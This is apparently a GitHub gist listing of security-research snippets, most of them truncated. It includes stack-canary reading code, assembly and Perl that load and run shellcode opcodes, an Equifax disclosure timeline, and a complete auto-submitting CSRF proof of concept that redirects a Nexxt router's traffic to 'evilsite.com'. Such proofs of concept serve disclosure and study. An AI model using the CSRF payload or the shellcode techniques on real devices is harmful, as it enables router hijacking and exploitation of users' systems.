This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl -w | |
| use strict; | |
| use warnings; | |
| use Net::ARP; | |
| my $source = "10.0.2.15"; | |
| my $dev = "enp0s3"; | |
| WHILE: print "\$ "; |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [1] 17/07/2017: Contacted Equifax via @AskEquifax. | |
| [2] 22/07/2017: After no response, the issue was made public. | |
| [3] XX/09/2017: Issue fixed after "Equihax" breach. |
cedriczirtacic
/ main.c
Last active
July 3, 2017 21:29
getting canaries https://medium.com/@cedriczirtacic/peque%C3%B1o-texto-canarios-en-el-stack-3ce23f6c033b
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc -O1 -fstack-protector-all -o main main.c | |
| #include <stdio.h> | |
| #include <linux/types.h> | |
| #ifndef uint64_t | |
| typedef unsigned long uint64_t; | |
| #endif | |
| uint64_t get_canary() { | |
| uint64_t a; |
cedriczirtacic
/ gdb.sh
Last active
July 3, 2017 21:29
getting canaries https://medium.com/@cedriczirtacic/peque%C3%B1o-texto-canarios-en-el-stack-3ce23f6c033b
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| (gdb) disas main | |
| Dump of assembler code for function main: | |
| 0x00000000004005ab <+0>: sub $0x18,%rsp | |
| 0x00000000004005af <+4>: mov %fs:0x28,%rax | |
| 0x00000000004005b8 <+13>: mov %rax,0x8(%rsp) | |
| 0x00000000004005bd <+18>: xor %eax,%eax | |
| 0x00000000004005bf <+20>: callq 0x400566 <get_canary> | |
| 0x00000000004005c4 <+25>: mov (%rax),%rsi | |
| 0x00000000004005c7 <+28>: mov $0x400688,%edi | |
| 0x00000000004005cc <+33>: mov $0x0,%eax |
cedriczirtacic
/ load_opcodes.S
Last active
June 29, 2017 16:41
https://medium.com/@cedriczirtacic/ejecutando-opcodes-desde-memoria-9700e5a7e02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| .section .text | |
| .global _start | |
| _start: | |
| pushq %rbp | |
| movq %rsp, %rbp | |
| subq $13, %rsp | |
| shellcode: | |
| movb $0x05, -1(%rbp) | |
| movb $0x0f, -2(%rbp) | |
| movb $0xc7, -3(%rbp) |
cedriczirtacic
/ opcodes.pl
Last active
June 29, 2017 16:41
https://medium.com/@cedriczirtacic/ejecutando-opcodes-desde-memoria-9700e5a7e02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/perl -w | |
| use strict; | |
| use warnings; | |
| my $bin = $ARGV[0]; | |
| my $func= $ARGV[1]; | |
| die("./$0 <binary> <function>") if (!defined $bin or !defined $func); | |
| my @shellcode; |
cedriczirtacic
/ normal.S
Last active
June 29, 2017 16:41
https://medium.com/@cedriczirtacic/ejecutando-opcodes-desde-memoria-9700e5a7e02
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| _start: | |
| xorq %rax, %rax | |
| movb $0x3c, %al | |
| xorq %rdi, %rdi | |
| incb %dil | |
| syscall |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // gcc -c yes.S -o yes.o && gcc yes.o -o yes | |
| .file "yes.S" | |
| .data | |
| y: .string "y" | |
| .text | |
| .globl main | |
| main: | |
| cmpq $2, %rdi | |
| jl .L1 |
cedriczirtacic
/ nexxt_exploit1.html
Created
September 27, 2016 23:58
Nexxt Solutions Router V5.07.43_en_NEX01 CSRF to URL Redirection
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <body onload='document.forms[0].submit()'> | |
| <form action='http://192.168.0.1/goform/SysStatusHandle' method='post'> | |
| <input type="hidden" name="CMD" value="WAN_CON" /> | |
| <input type="hidden" name="GO" value="http://evilsite.com" /> | |
| <input type="hidden" name="action" value='2' /> | |
| </form> | |
| </body> |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #/usr/lib/systemd/system/ddclient.service | |
| [Unit] | |
| Description=ddclient Service | |
| After=network.target | |
| [Service] | |
| Type=forking | |
| PIDFile=/var/run/ddclient.pid | |
| ExecStart=/sbin/ddclient -pid /var/run/ddclient.pid -file /etc/ddclient/ddclient.conf -daemon 300 | |
| ExecStop=/usr/bin/pkill -SIGKILL -P /var/run/ddclient.pid |